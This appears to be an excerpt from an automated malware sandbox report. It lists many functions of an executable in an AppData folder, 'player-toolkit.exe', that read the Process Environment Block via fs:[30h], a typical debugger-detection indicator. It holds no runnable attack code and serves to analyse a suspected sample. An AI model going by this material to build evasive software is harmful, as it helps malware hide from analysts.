Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h] 2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0297B8E4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0297B8E4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h] 2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h] 2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h] 2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029558EC mov eax, dword ptr fs:[00000030h] 2_2_029558EC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h] 2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h] 2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h] 2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h] 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h] 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h] 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h] 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h] 2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h] 2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h] 2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h] 2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h] 2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h] 2_2_02A24015
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h] 2_2_02A24015
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h] 2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h] 2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h] 2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h] 2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h] 2_2_02970050
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h] 2_2_02970050
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12073 mov eax, dword ptr fs:[00000030h] 2_2_02A12073
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A21074 mov eax, dword ptr fs:[00000030h] 2_2_02A21074
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h] 2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h] 2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h] 2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h] 2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982990 mov eax, dword ptr fs:[00000030h] 2_2_02982990
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297C182 mov eax, dword ptr fs:[00000030h] 2_2_0297C182
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A185 mov eax, dword ptr fs:[00000030h] 2_2_0298A185
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h] 2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h] 2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h] 2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h] 2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h] 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h] 2_2_029861A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h] 2_2_029861A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D69A6 mov eax, dword ptr fs:[00000030h] 2_2_029D69A6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029E41E8 mov eax, dword ptr fs:[00000030h] 2_2_029E41E8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h] 2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h] 2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h] 2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h] 2_2_0298513A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h] 2_2_0298513A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h] 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h] 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h] 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h] 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 mov ecx, dword ptr fs:[00000030h] 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h] 2_2_0297B944
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h] 2_2_0297B944
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h] 2_2_0295B171
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h] 2_2_0295B171
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295C962 mov eax, dword ptr fs:[00000030h] 2_2_0295C962
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h] 2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h] 2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h] 2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EFE87 mov eax, dword ptr fs:[00000030h] 2_2_029EFE87
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D46A7 mov eax, dword ptr fs:[00000030h] 2_2_029D46A7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029836CC mov eax, dword ptr fs:[00000030h] 2_2_029836CC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02998EC7 mov eax, dword ptr fs:[00000030h] 2_2_02998EC7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0FEC0 mov eax, dword ptr fs:[00000030h] 2_2_02A0FEC0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28ED6 mov eax, dword ptr fs:[00000030h] 2_2_02A28ED6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029676E2 mov eax, dword ptr fs:[00000030h] 2_2_029676E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029816E0 mov ecx, dword ptr fs:[00000030h] 2_2_029816E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h] 2_2_0298A61C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h] 2_2_0298A61C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h] 2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h] 2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h] 2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02988E00 mov eax, dword ptr fs:[00000030h] 2_2_02988E00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0FE3F mov eax, dword ptr fs:[00000030h] 2_2_02A0FE3F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11608 mov eax, dword ptr fs:[00000030h] 2_2_02A11608
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295E620 mov eax, dword ptr fs:[00000030h] 2_2_0295E620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h] 2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h] 2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h] 2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h] 2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h] 2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h] 2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h] 2_2_02A1AE44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h] 2_2_02A1AE44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296766D mov eax, dword ptr fs:[00000030h] 2_2_0296766D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02968794 mov eax, dword ptr fs:[00000030h] 2_2_02968794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h] 2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h] 2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h] 2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029937F5 mov eax, dword ptr fs:[00000030h] 2_2_029937F5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297F716 mov eax, dword ptr fs:[00000030h] 2_2_0297F716
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h] 2_2_029EFF10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h] 2_2_029EFF10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h] 2_2_0298A70E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h] 2_2_0298A70E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298E730 mov eax, dword ptr fs:[00000030h] 2_2_0298E730
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h] 2_2_0297B73D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h] 2_2_0297B73D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h] 2_2_02A2070D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h] 2_2_02A2070D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h] 2_2_02954F2E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h] 2_2_02954F2E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28F6A mov eax, dword ptr fs:[00000030h] 2_2_02A28F6A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296EF40 mov eax, dword ptr fs:[00000030h] 2_2_0296EF40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296FF60 mov eax, dword ptr fs:[00000030h] 2_2_0296FF60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296849B mov eax, dword ptr fs:[00000030h] 2_2_0296849B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h] 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A114FB mov eax, dword ptr fs:[00000030h] 2_2_02A114FB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h] 2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h] 2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h] 2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28CD6 mov eax, dword ptr fs:[00000030h] 2_2_02A28CD6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h] 2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h] 2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h] 2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h] 2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h] 2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h] 2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h] 2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h] 2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298BC2C mov eax, dword ptr fs:[00000030h] 2_2_0298BC2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h] 2_2_029EC450
